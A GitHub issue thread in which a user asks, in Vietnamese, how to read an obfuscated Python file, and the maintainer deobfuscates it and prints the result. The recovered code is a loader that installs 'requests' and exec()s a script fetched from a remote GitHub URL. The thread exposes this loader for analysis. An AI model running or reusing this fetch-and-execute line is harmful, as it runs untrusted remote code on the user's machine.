### ISSUE TITLE
help

### ISSUE THREAD

**Issue by meopeongokngheck** [KhanhNguyen9872/dump_marshal_py#5]
co cach nao de doc duoc file nay ko ban

**Comment by KhanhNguyen9872** [comment]
> co cach nao de doc duoc file nay ko ban [Rejoin.zip](https://github.com/user-attachments/files/17396511/Rejoin.zip)

1. dump marshal
2. convert marshal -> pyc
3. using my bot @khanhnguyen9872_bot for decompile using pycdc

result of decompile: [decompiled_Rejoin.txt](https://github.com/user-attachments/files/17396929/decompiled_Rejoin.txt)

result after rewrite
```python3
import os
try:
    import requests
except ModuleNotFoundError:
    os.system('pip install requests')
    os._exit(0)

exec(requests.get('https://raw.githubusercontent.com/u400822/module/main/python/hash-out.py'))
```
